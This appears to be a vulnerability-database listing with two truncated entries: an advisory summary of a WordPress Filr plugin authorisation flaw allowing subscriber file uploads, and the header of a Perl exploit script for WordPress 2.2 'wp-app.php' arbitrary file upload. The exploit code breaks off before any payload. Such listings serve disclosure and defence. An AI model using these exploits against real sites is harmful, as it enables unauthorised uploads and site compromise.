Filr - Secure Document Library < 1.2.2.1 - Subscriber+ AJAX Calls
The plugin does not have an authorisation check in two of its AJAX actions, allowing them to be called by any authenticated user, such as a subscriber. They are protected with a nonce, however the nonce is leaked on the dashboard. This could allow them to upload arbitrary HTML files as well as...
WordPress Core 2.2 - 'wp-app.php' Arbitrary File Upload
#!/usr/bin/env perl
# Wordpress 2.2 and Wordpress MU
# Website : http://www.buayacorp.com/
# Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html
use Digest::MD5 qw(md5_hex);
use LWP::UserAgent;
my $ua = new LWP::UserAgent;
my $blog = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];
my...